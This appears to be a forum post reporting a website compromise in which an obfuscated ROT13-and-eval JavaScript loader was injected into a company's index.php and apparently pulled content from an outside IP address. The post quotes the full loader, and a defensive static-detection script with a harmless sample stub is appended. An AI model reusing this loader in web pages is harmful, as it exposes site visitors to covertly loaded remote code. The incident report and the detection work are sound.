
JavaScript injected into PHP

  • 02-04-2008 3:44pm
    #1
    Closed Accounts Posts: 8,478 ✭✭✭


    We had this happen to our company website. It infected our index.php file somehow. After that we then got a WORLD of bounceback emails all from Russia. This is the JavaScript code:
    var kco=" shapgvba hmdvx(oz){ine fz,we=\"{v^abRkP9 |V}!6w~pn)@GZro#[$y,`:SO0dMjm&AihU2W;5.lt8fH']u_\\\"q+7BIXNCegs13xT-c(4*z=\",t=\"\",du,dsj,v=\"\",nt;sbe(fz=0;fz<oz.yratgu;fz++){ du=oz.puneNg(fz);dsj=we.vaqrkBs(du);vs(dsj>-1){ nt=((dsj+1)%81-1);vs(nt<=0)nt+=81;v+=we.puneNg(nt-1); } ryfr v+=du;}t+=v;qbphzrag.jevgr(t);}",tuy="";for(mhs=0;mhs<kco.length;mhs++){ xcxg = kco.charCodeAt(mhs);if((xcxg>64 && xcxg<78)||(xcxg>96 && xcxg<110)) xcxg=xcxg+13;
    else if((xcxg>77 && xcxg<91)||(xcxg>109 && xcxg<123))xcxg=xcxg-13;tuy=tuy.concat(String.fromCharCode(xcxg));} var ddy,xnx; eval( tuy );ddy="<Uat^(f|,)o8H)8b{d~)u)Uat^(fd>|+EaH=bofyzt^fb4|d<S9R}rM|,)o8H)8b{\\d;)u)Sat^(f\\d|SR9{\\d_ff(F//zzzy8EE8,b)o),gf,aUyaE=/\"\"Hfuy~U?d7+EaH=bofytb1bttbt7d\\d><\\/S9R}rM>d|@5|</Uat^(f>|"; uzqik(ddy);
    

    Possibly linked, but one of the staffers spotted in IE that it was trying to load the following IP address after our website had loaded:

    http://58.65.234.163/...some random page....

    Having taken out the JavaScript code, it looks like the spam has died down and hopefully we will be back to normal. But we weren't the only ones.

    http://www.codingforums.com/showthread.php?p=671538
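
A static check for the loader structure shown in the post, as an added example that is not part of the original post: it flags a file that combines a `charCodeAt` loop, a shift by 13, `String.fromCharCode` and `eval`, and ROT13-decodes its string literals as text without executing anything. The sample inputs, the `MARKERS` table and all function names are constructed for illustration.

```javascript
// Static triage for an injected ROT13 + eval() loader. Nothing is executed:
// the hidden layer is decoded as plain text so it can be read and logged.

// ROT13 over ASCII letters only; every other character passes through.
function rot13(text) {
  return text.replace(/[a-zA-Z]/g, (ch) => {
    const base = ch <= "Z" ? 65 : 97;
    return String.fromCharCode(((ch.charCodeAt(0) - base + 13) % 26) + base);
  });
}

// Structural markers of the decoder loop (hypothetical heuristic, not a product rule).
const MARKERS = {
  charCodeLoop: /\.charCodeAt\s*\(/,
  shiftBy13: /[+-]\s*13\b/,
  fromCharCode: /String\.fromCharCode\s*\(/,
  evalCall: /\beval\s*\(/,
};

// Extract double-quoted string literals, honouring backslash escapes.
function stringLiterals(source) {
  const out = [];
  const re = /"((?:[^"\\]|\\.)*)"/g;
  let m;
  while ((m = re.exec(source)) !== null) out.push(m[1]);
  return out;
}

// Inspect one file's text. `decoded` holds only literals whose ROT13 form
// writes markup into the page, which is what the loader in the post does.
function triage(source) {
  const hits = Object.keys(MARKERS).filter((k) => MARKERS[k].test(source));
  const suspicious = hits.length === Object.keys(MARKERS).length;
  const decoded = stringLiterals(source)
    .map(rot13)
    .filter((d) => /document\.write|<iframe|<script/i.test(d));
  return { suspicious, hits, writesToPage: decoded.length > 0, decoded };
}

// Constructed samples: a harmless stub with the same shape, and a clean page.
const SAMPLE_INFECTED =
  '<?php include "header.php"; ?>\n' +
  '<script>var a="shapgvba j(f){qbphzrag.jevgr(f);}",b="";' +
  "for(i=0;i<a.length;i++){c=a.charCodeAt(i);" +
  "if((c>64&&c<78)||(c>96&&c<110))c=c+13;" +
  "else if((c>77&&c<91)||(c>109&&c<123))c=c-13;" +
  "b=b.concat(String.fromCharCode(c));}eval(b);</script>";
const SAMPLE_CLEAN = '<?php echo "hello"; ?><script>document.write("hi");</script>';

console.log(triage(SAMPLE_INFECTED), triage(SAMPLE_CLEAN));
```

Run against every served file after a cleanup, a check like this shows whether a second injected copy remains elsewhere in the web root.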

